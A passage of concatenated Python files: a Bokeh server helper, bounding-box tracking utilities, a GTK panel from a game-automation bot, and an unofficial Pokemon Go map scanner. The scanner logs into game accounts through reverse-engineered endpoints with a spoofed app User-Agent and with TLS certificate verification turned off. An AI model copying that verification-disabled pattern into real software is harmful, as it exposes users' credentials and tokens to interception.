              the alert invokes the supplied shutdown method."""

    def __init__(self, shutDownMethod):
        """@brief Constructor
           @param shutDownMethod The method that is called to shutdown the application."""
        self._alertButtonWrapper = AlertButtonWrapper(
            "Quit",
            "The application is shutting down. Please close the browser window",
            buttonType="danger",
            onClickMethod=shutDownMethod)

    def getWidget(self):
        """@brief Return the shutdown button widget to be added to a layout."""
        return self._alertButtonWrapper.getWidget()
class SingleAppServer(object):
    """@brief Responsible for running a bokeh server containing a single app.
              The server may be started by calling either a blocking or a non
              blocking method. This provides a basic parent class with
              the freedom to define your app as required."""

    @staticmethod
    def GetNextUnusedPort(basePort=1024, maxPort=65534, bindAddress="localhost"):
        """@brief Get the first unused port at or above the base port.
           @param basePort The port to start checking for available ports.
           @param maxPort The highest port number to check.
           @param bindAddress The address to bind to.
           @return The TCP port or -1 if no port is available."""
        port = basePort
        while True:
            sock = socket.socket()
            try:
                sock.bind((bindAddress, port))
                return port
            except OSError:
                # Port in use (or not bindable): try the next one. The
                # original code used a bare except and leaked the socket.
                port = port + 1
                if port > maxPort:
                    return -1
            finally:
                # Always release the probe socket, bind success or failure.
                sock.close()

    def __init__(self, bokehPort=0):
        """@brief Constructor
           @param bokehPort The TCP port to run the server on. If left at the default
                  of 0 then a spare TCP port will be used."""
        if bokehPort == 0:
            bokehPort = SingleAppServer.GetNextUnusedPort()
        self._bokehPort = bokehPort

    def getServerPort(self):
        """@return The bokeh server port."""
        return self._bokehPort

    def runBlockingBokehServer(self, appMethod):
        """@brief Run the bokeh server. This method will only return when the server shuts down.
           @param appMethod The method called to create the app."""
        apps = {'/': Application(FunctionHandler(appMethod))}
        # As this may be run in a thread we need to install an event loop.
        evtLoop = asyncio.new_event_loop()
        asyncio.set_event_loop(evtLoop)
        self._server = Server(apps, port=self._bokehPort)
        self._server.start()
        # Show the server in a web browser window.
        self._server.io_loop.add_callback(self._server.show, "/")
        self._server.io_loop.start()

    def runNonBlockingBokehServer(self, appMethod):
        """@brief Run the bokeh server in a separate thread. This is useful
                  if we want to load realtime data into the plot from the
                  main thread.
           @param appMethod The method called to create the app."""
        self._serverThread = threading.Thread(target=self.runBlockingBokehServer, args=(appMethod,))
        # daemon attribute instead of the deprecated setDaemon() call.
        self._serverThread.daemon = True
        self._serverThread.start()
|
tracking_utils.py | import threading
import time
import numpy as np
class Box:
    """Axis-aligned bounding box with integer coordinates plus two flags
    used by the tracker's two-phase discard protocol."""

    def __init__(self, x_y_w_h):
        self.x, self.y, self.w, self.h = (int(v) for v in x_y_w_h)
        self.is_discarded: bool = False
        self.is_being_discarded: bool = False

    def update(self, x_y_w_h):
        """Replace the coordinates, truncating each value to int."""
        self.x, self.y, self.w, self.h = (int(v) for v in x_y_w_h)

    def discard(self):
        """Finalise the discard, but only if it is still flagged as pending."""
        if self.is_being_discarded:
            self.is_discarded = True

    def area(self):
        """Pixel area of the box (width * height)."""
        return self.h * self.w

    def __str__(self):
        return "({}, {}, {}, {})".format(self.x, self.y, self.w, self.h)
class Countdown(object):
    """Grace-period helper: after ~2 seconds asks the watched box to
    discard itself (Box.discard only acts while the discard is pending)."""

    def __init__(self, obj_box):
        # Store the box BEFORE starting the worker thread; the original
        # started the thread first, so run() could race against a
        # half-initialised instance and hit a missing self.b.
        self.b = obj_box
        thread = threading.Thread(target=self.run, args=())
        thread.daemon = True
        thread.start()

    def run(self):
        """Worker: announce each second of the countdown, then discard."""
        for i in range(2):
            print("is discarding now")
            time.sleep(1)
        self.b.discard()
def which_is_foreground(bodies):
    """Return the body tuple (x, y, w, h) with the largest area.

    Ties go to the earliest entry, matching the previous
    list.index(max(...)) lookup, but areas are now computed once
    in a single pass instead of three times.
    """
    def area(box):
        (x, y, w, h) = box
        return w * h
    return max(bodies, key=area)
def calculate_iou(box_d, box_t):
    """Intersection-over-union between a detection tuple (x, y, w, h) and a
    tracked box object exposing .x/.y/.w/.h attributes.

    Returns 0 when the boxes do not overlap. The original fell through
    after setting iou = 0, so two boxes disjoint on BOTH axes (negative
    width AND height overlap) produced a spurious positive IoU.
    """
    (x1, y1, w1, h1) = box_d
    (x2, y2, w2, h2) = (box_t.x, box_t.y, box_t.w, box_t.h)
    w_intersec = min(x1 + w1, x2 + w2) - max(x1, x2)
    h_intersec = min(y1 + h1, y2 + h2) - max(y1, y2)
    if w_intersec <= 0 or h_intersec <= 0:
        return 0
    I = w_intersec * h_intersec
    U = w1 * h1 + w2 * h2 - I
    return I / U
|
dev.py | # Dindo Bot
# Copyright (c) 2018 - 2019 AXeL
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, GdkPixbuf
from lib import tools, data, convert
from .custom import CustomTreeView, CustomComboBox, MenuButton, SpinButton, ButtonBox
from .dialog import CopyTextDialog
from threading import Thread
class DevToolsWidget(Gtk.Box):
    """Developer-tools panel for the bot window.

    Three sections: a 'Pixel' list of captured screen locations/colors with
    select/simulate/delete buttons, a 'Key Press' combo with a simulate
    button, and a 'Scroll' direction/amount simulator. All simulated input
    is routed through the parent window's helper methods and the tools
    module.
    """

    def __init__(self, parent):
        """Build the Pixel / Key Press / Scroll sections of the panel.

        @param parent Main window object; the code below relies on its
               game_window, game_window_location, debug(), focus_game(),
               set_cursor() and wait_for_click() members.
        """
        Gtk.Box.__init__(self, orientation=Gtk.Orientation.VERTICAL, spacing=5)
        self.set_border_width(10)
        self.parent = parent
        #self.parent.connect('button-press-event', self.on_click)
        ## Pixel
        top_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
        top_box.add(Gtk.Label('<b>Pixel</b>', xalign=0, use_markup=True))
        hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=10)
        top_box.pack_start(hbox, True, True, 0)
        self.add(top_box)
        # TreeView: one row per captured pixel (swatch, x, y, w, h, color)
        model = Gtk.ListStore(GdkPixbuf.Pixbuf, int, int, int, int, str)
        text_renderer = Gtk.CellRendererText()
        columns = [
            Gtk.TreeViewColumn('', Gtk.CellRendererPixbuf(), pixbuf=0),
            Gtk.TreeViewColumn('X', text_renderer, text=1),
            Gtk.TreeViewColumn('Y', text_renderer, text=2),
            Gtk.TreeViewColumn('Width', text_renderer, text=3),
            Gtk.TreeViewColumn('Height', text_renderer, text=4),
            Gtk.TreeViewColumn('Color', text_renderer, text=5)
        ]
        self.tree_view = CustomTreeView(model, columns)
        self.tree_view.connect('button-press-event', self.on_tree_view_double_clicked)
        self.tree_view.connect('selection-changed', self.on_tree_view_selection_changed)
        hbox.pack_start(self.tree_view, True, True, 0)
        # Select
        buttons_box = ButtonBox(orientation=Gtk.Orientation.VERTICAL, centered=True, linked=True)
        hbox.add(buttons_box)
        self.select_pixel_button = Gtk.Button()
        pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/crosshair.png'), 16, 16)
        #pixbuf = Gdk.Cursor(Gdk.CursorType.CROSSHAIR).get_image().scale_simple(18, 18, GdkPixbuf.InterpType.BILINEAR)
        self.select_pixel_button.set_image(Gtk.Image(pixbuf=pixbuf))
        self.select_pixel_button.set_tooltip_text('Select')
        self.select_pixel_button.connect('clicked', self.on_select_pixel_button_clicked)
        buttons_box.add(self.select_pixel_button)
        # Simulate
        self.simulate_click_button = Gtk.Button()
        pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/hand.png'), 16, 16)
        #pixbuf = Gdk.Cursor(Gdk.CursorType.HAND1).get_image().scale_simple(18, 18, GdkPixbuf.InterpType.BILINEAR)
        self.simulate_click_button.set_image(Gtk.Image(pixbuf=pixbuf))
        self.simulate_click_button.set_tooltip_text('Simulate Click')
        self.simulate_click_button.set_sensitive(False)
        self.simulate_click_button.connect('clicked', self.on_simulate_click_button_clicked)
        buttons_box.add(self.simulate_click_button)
        # Delete
        self.delete_pixel_button = Gtk.Button()
        self.delete_pixel_button.set_image(Gtk.Image(icon_name='edit-delete-symbolic'))
        self.delete_pixel_button.set_tooltip_text('Delete')
        self.delete_pixel_button.set_sensitive(False)
        self.delete_pixel_button.connect('clicked', self.on_delete_pixel_button_clicked)
        buttons_box.add(self.delete_pixel_button)
        ## Key Press
        bottom_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
        self.add(bottom_box)
        vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
        bottom_box.pack_start(vbox, True, True, 0)
        hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
        vbox.add(hbox)
        hbox.add(Gtk.Label('<b>Key Press</b>', xalign=0, use_markup=True))
        # Label showing the shortcut string of the selected combo entry
        self.keys_label = Gtk.Label()
        hbox.add(self.keys_label)
        # ComboBox
        hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
        vbox.add(hbox)
        self.keys_combo = CustomComboBox(data.KeyboardShortcuts, sort=True)
        self.keys_combo.connect('changed', self.on_keys_combo_changed)
        hbox.pack_start(self.keys_combo, True, True, 0)
        # Simulate
        self.simulate_key_press_button = Gtk.Button()
        self.simulate_key_press_button.set_image(Gtk.Image(icon_name='input-keyboard'))
        self.simulate_key_press_button.set_tooltip_text('Simulate')
        self.simulate_key_press_button.set_sensitive(False)
        self.simulate_key_press_button.connect('clicked', self.on_simulate_key_press_button_clicked)
        hbox.add(self.simulate_key_press_button)
        ## Scroll
        vbox.add(Gtk.Label('<b>Scroll</b>', xalign=0, use_markup=True))
        hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
        vbox.add(hbox)
        # Direction
        self.scroll_direction_combo = CustomComboBox(['up', 'down'])
        self.scroll_direction_combo.set_active(1)
        hbox.pack_start(self.scroll_direction_combo, True, True, 0)
        # Value (1-10), edited through a popover spin button
        self.scroll_menu_button = MenuButton(text='1', position=Gtk.PositionType.TOP)
        self.scroll_spin_button = SpinButton(min=1, max=10)
        self.scroll_spin_button.connect('value-changed', lambda button: self.scroll_menu_button.set_label(str(button.get_value_as_int())))
        self.scroll_menu_button.add(self.scroll_spin_button)
        hbox.add(self.scroll_menu_button)
        # Simulate
        simulate_scroll_button = Gtk.Button()
        pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/scroll.png'), 16, 16)
        #pixbuf = Gdk.Cursor(Gdk.CursorType.SB_V_DOUBLE_ARROW).get_image().scale_simple(18, 18, GdkPixbuf.InterpType.BILINEAR)
        simulate_scroll_button.set_image(Gtk.Image(pixbuf=pixbuf))
        simulate_scroll_button.set_tooltip_text('Simulate')
        simulate_scroll_button.connect('clicked', self.on_simulate_scroll_button_clicked)
        hbox.add(simulate_scroll_button)

    def on_simulate_scroll_button_clicked(self, button):
        """Scroll by the chosen amount; 'up' gives positive clicks, 'down'
        negative. Targets the centre of the game window when attached."""
        # get scroll value
        direction = self.scroll_direction_combo.get_active_text()
        value = self.scroll_spin_button.get_value_as_int()
        clicks = value if direction == 'up' else -value
        if self.parent.game_window and not self.parent.game_window.is_destroyed() and self.parent.game_window_location:
            # get the center of the game location
            x, y = tools.coordinates_center(self.parent.game_window_location)
        else:
            x, y = (None, None)
        # scroll
        self.parent.focus_game()
        self.parent.debug('Scroll: %d' % clicks)
        tools.scroll_to(clicks, x, y, 0.5)

    def on_keys_combo_changed(self, combo):
        """Show the shortcut of the newly selected key and enable the
        key-press simulate button."""
        selected = combo.get_active_text()
        self.keys_label.set_text('(' + data.KeyboardShortcuts[selected] + ')')
        if not self.simulate_key_press_button.get_sensitive():
            self.simulate_key_press_button.set_sensitive(True)

    def add_pixel(self, location):
        """Append a captured pixel to the tree view with a colour swatch;
        invoked as the callback of parent.wait_for_click().

        @param location Tuple of (x, y, width, height, color).
        """
        x, y, width, height, color = location
        # create pixbuf used as the 10x10 colour swatch in the first column
        pixbuf = GdkPixbuf.Pixbuf.new(GdkPixbuf.Colorspace.RGB, False, 8, 10, 10)
        pixel = convert.rgb2pixel(color)
        pixbuf.fill(pixel)
        # append to treeview
        self.tree_view.append_row([pixbuf, x, y, width, height, str(color)])
        self.select_pixel_button.set_sensitive(True)
        self.parent.set_cursor(Gdk.Cursor(Gdk.CursorType.ARROW))

    def on_select_pixel_button_clicked(self, button):
        """Switch to a crosshair cursor and wait (in a thread) for the user
        to click the pixel to capture; add_pixel() receives the result."""
        button.set_sensitive(False)
        self.parent.set_cursor(Gdk.Cursor(Gdk.CursorType.CROSSHAIR))
        # wait for click
        Thread(target=self.parent.wait_for_click, args=(self.add_pixel, self.parent.game_window_location)).start()

    def on_simulate_click_button_clicked(self, button):
        """Replay a click at the selected pixel, remapping the stored
        coordinates onto the current game window when one is attached."""
        # get click coordinates
        selected_row = self.tree_view.get_selected_row()
        x, y, width, height = (selected_row[1], selected_row[2], selected_row[3], selected_row[4])
        #print('x: %d, y: %d, width: %d, height: %d' % (x, y, width, height))
        # adjust for game area
        if self.parent.game_window and not self.parent.game_window.is_destroyed() and self.parent.game_window_location:
            game_x, game_y, game_width, game_height = self.parent.game_window_location
            #print('game_x: %d, game_y: %d, game_width: %d, game_height: %d' % (game_x, game_y, game_width, game_height))
            click_x, click_y = tools.adjust_click_position(x, y, width, height, game_x, game_y, game_width, game_height)
        else:
            click_x = x
            click_y = y
        # perform click
        self.parent.debug('Simulate click on x: %d, y: %d' % (click_x, click_y))
        tools.perform_click(click_x, click_y)

    def on_delete_pixel_button_clicked(self, button):
        """Remove the selected pixel row from the tree view."""
        self.tree_view.remove_selected_row()

    def on_simulate_key_press_button_clicked(self, button):
        """Send the selected keyboard shortcut to the focused game window."""
        selected = self.keys_combo.get_active_text()
        key = data.KeyboardShortcuts[selected]
        self.parent.focus_game()
        self.parent.debug('Press key: %s' % key)
        tools.press_key(key, 0.5)

    def on_click(self, widget, event):
        """Debug helper: print raw click coordinates (normally left
        disconnected, see the commented connect in __init__)."""
        print('x: %d, y: %d' % (event.x, event.y))

    def on_tree_view_double_clicked(self, widget, event):
        """On double click, open a copyable dialog with the selected pixel
        rendered as a dict literal."""
        if event.type == Gdk.EventType.DOUBLE_BUTTON_PRESS:
            selected_row = self.tree_view.get_selected_row()
            if selected_row:
                x, y, width, height, color = (selected_row[1], selected_row[2], selected_row[3], selected_row[4], selected_row[5])
                CopyTextDialog(self.parent, "{'x': %d, 'y': %d, 'width': %d, 'height': %d, 'color': %s}" % (x, y, width, height, color))

    def on_tree_view_selection_changed(self, selection):
        """Keep the simulate-click and delete buttons enabled only while a
        row is selected."""
        model, tree_iter = selection.get_selected()
        if tree_iter is None:
            self.simulate_click_button.set_sensitive(False)
            self.delete_pixel_button.set_sensitive(False)
        else:
            if not self.simulate_click_button.get_sensitive():
                self.simulate_click_button.set_sensitive(True)
            if not self.delete_pixel_button.get_sensitive():
                self.delete_pixel_button.set_sensitive(True)
|
example.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
# The scanner deliberately talks to the API with TLS verification disabled
# (SESSION.verify = False below), so silence urllib3's warning about it.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Niantic / Pokemon Club endpoints used by the login and RPC flows.
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
    'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'

# Client secrets are read from a local credentials.json at import time;
# missing keys simply become None. NOTE: 'file' shadows the Py2 builtin.
with open('credentials.json') as file:
    credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)

# One shared HTTP session for every request; certificate checks disabled.
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False

# Credential / token cache shared across login attempts.
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False  # if you want to write raw request/response to the console

# Current position: COORDS_* hold the f2i-encoded values sent to the API,
# FLOAT_* the plain degrees; NEXT_* is a pending jump target (0 = none).
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None

# Entities discovered while scanning, keyed by id for the map front-end.
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
    0: 'Gym',
    1: 'Mystic',
    2: 'Valor',
    3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def memoize(obj):
    """Decorator: cache obj's results keyed on the stringified call args.

    The cache dict is also exposed as the wrapped function's .cache
    attribute. Note the key space is unbounded, so this grows forever.
    """
    # Local import: the module top never imports functools, so the original
    # decorator raised NameError on functools.wraps the first time it ran.
    import functools
    cache = obj.cache = {}

    @functools.wraps(obj)
    def memoizer(*args, **kwargs):
        key = str(args) + str(kwargs)
        if key not in cache:
            cache[key] = obj(*args, **kwargs)
        return cache[key]
    return memoizer
def parse_unicode(bytestring):
    """Decode a byte string using the filesystem encoding (used as the
    argparse type for the --location option)."""
    return bytestring.decode(sys.getfilesystemencoding())
def debug(message):
    # Print a '[-] ' prefixed diagnostic line, but only while the module
    # level DEBUG flag is set (Python 2 print statement).
    if DEBUG:
        print '[-] {}'.format(message)
def time_left(ms):
    """Convert a millisecond duration into an (hours, minutes, seconds) tuple.

    Uses floor division so the seconds stay integral under both Python 2
    and Python 3 (the previous 'ms / 1000' silently became a float on
    Python 3, which would leak into the formatted timer strings).
    """
    s = ms // 1000
    (m, s) = divmod(s, 60)
    (h, m) = divmod(m, 60)
    return (h, m, s)
def encode(cellid):
    # Serialise an S2 cell id as a protobuf varint. Relies on Python 2
    # semantics: the internal _VarintEncoder writes raw byte strings via
    # output.append, and ''.join() concatenates them (str == bytes on Py2).
    output = []
    encoder._VarintEncoder()(output.append, cellid)
    return ''.join(output)
def getNeighbors():
    """Return 21 level-15 S2 cell ids centred on the current position:
    the origin cell plus the 10 preceding and 10 following cells along
    the Hilbert curve."""
    origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
                                 FLOAT_LONG)).parent(15)
    walk = [origin.id()]
    # 10 before and 10 after (renamed so we no longer shadow next()/prev)
    after = origin.next()
    before = origin.prev()
    for _ in range(10):
        walk.append(before.id())
        walk.append(after.id())
        after = after.next()
        before = before.prev()
    return walk
def f2i(float):
    """Reinterpret a double's IEEE-754 bit pattern as an unsigned 64-bit int."""
    (bits,) = struct.unpack('<Q', struct.pack('<d', float))
    return bits
def f2h(float):
    """Hex string of a double's raw 64-bit pattern (e.g. 1.0 -> 0x3ff...)."""
    (bits,) = struct.unpack('<Q', struct.pack('<d', float))
    return hex(bits)
def h2f(hex):
    """Inverse of f2h: decode a hex bit-pattern string back into a double."""
    packed = struct.pack('<Q', int(hex, 16))
    return struct.unpack('<d', packed)[0]
def retrying_set_location(location_name):
    """
    Continue trying to get co-ords from Google Location until we have them
    :param location_name: string to pass to Location API
    :return: None
    """
    while True:
        try:
            set_location(location_name)
            return
        except (GeocoderTimedOut, GeocoderServiceError), e:  # Python 2 except syntax
            debug(
                'retrying_set_location: geocoder exception ({}), retrying'.format(
                    str(e)))
        # brief back-off so we do not hammer the geocoder on repeated failures
        time.sleep(1.25)
def set_location(location_name):
    """Resolve location_name to coordinates and make them the current position.

    Accepts either a raw "lat,lng" pair or a free-form address which is
    geocoded via Google. Updates the module-level origin_lat/origin_lon
    globals and pushes the result into the encoded coordinate globals.
    """
    geolocator = GoogleV3()
    # Matches "<lat>,<lng>" with optional sign and decimals, e.g. "48.85,2.35"
    prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
    global origin_lat
    global origin_lon
    if prog.match(location_name):
        local_lat, local_lng = [float(x) for x in location_name.split(",")]
        alt = 0
        origin_lat, origin_lon = local_lat, local_lng
    else:
        loc = geolocator.geocode(location_name)
        origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
        alt = loc.altitude
        print '[!] Your given location: {}'.format(loc.address.encode('utf-8'))
    print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
    set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
    """Update the module-level position globals: the plain-degree FLOAT_*
    pair and the f2i-encoded COORDS_* triple sent to the API."""
    global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
    global FLOAT_LAT, FLOAT_LONG
    FLOAT_LAT, FLOAT_LONG = lat, long
    COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE = (
        f2i(lat), f2i(long), f2i(alt))
def get_location_coords():
    # Return the current f2i-encoded position as a (lat, lng, alt) tuple.
    return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
    """Call api_req until it yields a non-empty response, retrying on
    transient transport / protobuf decode errors with a 1 s pause."""
    while True:
        try:
            response = api_req(service, api_endpoint, access_token, *args,
                               **kwargs)
            if response:
                return response
            debug('retrying_api_req: api_req returned None, retrying')
        except (InvalidURL, ConnectionError, DecodeError), e:  # Python 2 except syntax
            debug('retrying_api_req: request error ({}), retrying'.format(
                str(e)))
        time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
    """Build a RequestEnvelop, POST it to the RPC endpoint and return the
    parsed ResponseEnvelop.

    Extra positional args are merged into the envelope. Pass
    useauth=<auth ticket> to authenticate with the session ticket instead
    of the provider access token.
    """
    p_req = pokemon_pb2.RequestEnvelop()
    p_req.rpc_id = 1469378659230941192
    p_req.unknown1 = 2
    (p_req.latitude, p_req.longitude, p_req.altitude) = \
        get_location_coords()
    p_req.unknown12 = 989
    if 'useauth' not in kwargs or not kwargs['useauth']:
        # First contact: authenticate with the provider token.
        p_req.auth.provider = service
        p_req.auth.token.contents = access_token
        p_req.auth.token.unknown13 = 14
    else:
        # Subsequent calls reuse the session ticket returned by the server.
        p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
        p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
        p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
    for arg in args:
        p_req.MergeFrom(arg)
    protobuf = p_req.SerializeToString()
    r = SESSION.post(api_endpoint, data=protobuf, verify=False)
    p_ret = pokemon_pb2.ResponseEnvelop()
    p_ret.ParseFromString(r.content)
    if VERBOSE_DEBUG:
        print 'REQUEST:'
        print p_req
        print 'Response:'
        print p_ret
        print '''
'''
    # Crude client-side rate limiting between RPC calls.
    time.sleep(0.51)
    return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
    """Resolve the per-account RPC endpoint by polling the profile call
    until it returns a response carrying a non-empty api_url."""
    endpoint_info = None
    while not endpoint_info:
        endpoint_info = retrying_get_profile(service, access_token, api,
                                             None)
        if not hasattr(endpoint_info, 'api_url'):
            debug(
                'retrying_get_profile: get_profile returned no api_url, retrying')
            endpoint_info = None
        elif not len(endpoint_info.api_url):
            debug(
                'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
            endpoint_info = None
    return 'https://%s/rpc' % endpoint_info.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
    """Call get_profile until the response carries a non-empty payload."""
    reply = None
    while not reply:
        reply = get_profile(service, access_token, api, useauth,
                            *reqq)
        if not hasattr(reply, 'payload'):
            debug(
                'retrying_get_profile: get_profile returned no payload, retrying')
            reply = None
        elif not reply.payload:
            debug(
                'retrying_get_profile: get_profile returned no-len payload, retrying')
            reply = None
    return reply
def get_profile(service, access_token, api, useauth, *reqq):
    """Assemble the standard five-slot request envelope (types 2, 126, 4,
    129, 5), merging any supplied sub-requests positionally, and send it."""
    req = pokemon_pb2.RequestEnvelop()
    for slot, req_type in enumerate((2, 126, 4, 129, 5)):
        sub = req.requests.add()
        sub.type = req_type
        if len(reqq) > slot:
            sub.MergeFrom(reqq[slot])
    return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
    """Perform the two-step Google login (master token, then OAuth for the
    Pokemon Go app id) and return the resulting auth token string."""
    print '[!] Google login for: {}'.format(username)
    r1 = perform_master_login(username, password, ANDROID_ID)
    r2 = perform_oauth(username,
                       r1.get('Token', ''),
                       ANDROID_ID,
                       SERVICE,
                       APP,
                       CLIENT_SIG, )
    return r2.get('Auth')
def login_ptc(username, password):
    """Log in through the Pokemon Trainer Club SSO flow and return an
    OAuth access token string, or None when any step fails."""
    print '[!] PTC login for: {}'.format(username)
    head = {'User-Agent': 'Niantic App'}
    r = SESSION.get(LOGIN_URL, headers=head)
    if r is None:
        # NOTE(review): 'fullmap' is not defined in this scope, so this
        # branch would raise NameError if it ever executed - verify intent.
        return render_template('nope.html', fullmap=fullmap)
    try:
        jdata = json.loads(r.content)
    except ValueError, e:  # Python 2 except syntax
        debug('login_ptc: could not decode JSON from {}'.format(r.content))
        return None
    # Maximum password length is 15 (sign in page enforces this limit, API does not)
    if len(password) > 15:
        print '[!] Trimming password to 15 characters'
        password = password[:15]
    data = {
        'lt': jdata['lt'],
        'execution': jdata['execution'],
        '_eventId': 'submit',
        'username': username,
        'password': password,
    }
    r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
    ticket = None
    try:
        # The SSO ticket is carried in the redirect's Location header.
        ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
    except Exception, e:  # Python 2 except syntax
        if DEBUG:
            print r1.json()['errors'][0]
        return None
    data1 = {
        'client_id': 'mobile-app_pokemon-go',
        'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
        'client_secret': PTC_CLIENT_SECRET,
        'grant_type': 'refresh_token',
        'code': ticket,
    }
    r2 = SESSION.post(LOGIN_OAUTH, data=data1)
    # Strip the surrounding form-encoded fields to isolate the token value.
    access_token = re.sub('&expires.*', '', r2.content)
    access_token = re.sub('.*access_token=', '', access_token)
    return access_token
def get_heartbeat(service,
                  api_endpoint,
                  access_token,
                  response, ):
    """Query the map cells around the current coordinates and return the
    parsed HeartbeatPayload, or None when the reply has no payload."""
    # Client timestamp request (type left at default).
    time_req = pokemon_pb2.RequestEnvelop.Requests()
    msg = pokemon_pb2.RequestEnvelop.MessageSingleInt()
    msg.f1 = int(time.time() * 1000)
    time_req.message = msg.SerializeToString()
    # Fixed client key request.
    key_req = pokemon_pb2.RequestEnvelop.Requests()
    msg = pokemon_pb2.RequestEnvelop.MessageSingleString()
    msg.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
    key_req.message = msg.SerializeToString()
    # Map-cell request (type 106) covering the neighbouring S2 cells.
    walk = sorted(getNeighbors())
    map_req = pokemon_pb2.RequestEnvelop.Requests()
    map_req.type = 106
    msg = pokemon_pb2.RequestEnvelop.MessageQuad()
    msg.f1 = ''.join(map(encode, walk))
    msg.f2 = \
        "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
    msg.lat = COORDS_LATITUDE
    msg.long = COORDS_LONGITUDE
    map_req.message = msg.SerializeToString()
    response = get_profile(service,
                           access_token,
                           api_endpoint,
                           response.unknown7,
                           map_req,
                           pokemon_pb2.RequestEnvelop.Requests(),
                           time_req,
                           pokemon_pb2.RequestEnvelop.Requests(),
                           key_req, )
    try:
        payload = response.payload[0]
    except (AttributeError, IndexError):
        return
    heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
    heartbeat.ParseFromString(payload)
    return heartbeat
def get_token(service, username, password):
    """
    Get token if it's not None
    :return: the cached session token, performing the provider-specific
             login on first use
    :rtype: str or None
    """
    global global_token
    if global_token is None:
        login_fn = login_ptc if service == 'ptc' else login_google
        global_token = login_fn(username, password)
    return global_token
def get_args():
    """Build and parse the scanner's command line arguments. --username,
    --location and --step-limit are mandatory; --ignore and --only are
    mutually exclusive Pokemon filters."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-a', '--auth_service', type=str.lower,
                        help='Auth Service', default='ptc')
    parser.add_argument('-u', '--username', help='Username', required=True)
    parser.add_argument('-p', '--password', help='Password', required=False)
    parser.add_argument('-l', '--location', type=parse_unicode,
                        help='Location', required=True)
    parser.add_argument('-st', '--step-limit', help='Steps', required=True)
    group = parser.add_mutually_exclusive_group(required=False)
    group.add_argument('-i', '--ignore',
                       help='Comma-separated list of Pokémon names or IDs to ignore')
    group.add_argument('-o', '--only',
                       help='Comma-separated list of Pokémon names or IDs to search')
    parser.add_argument("-ar", "--auto_refresh",
                        help="Enables an autorefresh that behaves the same as a page reload. " +
                        "Needs an integer value for the amount of seconds")
    parser.add_argument('-dp', '--display-pokestop', help='Display pokéstop',
                        action='store_true', default=False)
    parser.add_argument('-dg', '--display-gym', help='Display Gym',
                        action='store_true', default=False)
    parser.add_argument('-H', '--host', help='Set web server listening host',
                        default='127.0.0.1')
    parser.add_argument('-P', '--port', type=int,
                        help='Set web server listening port', default=5000)
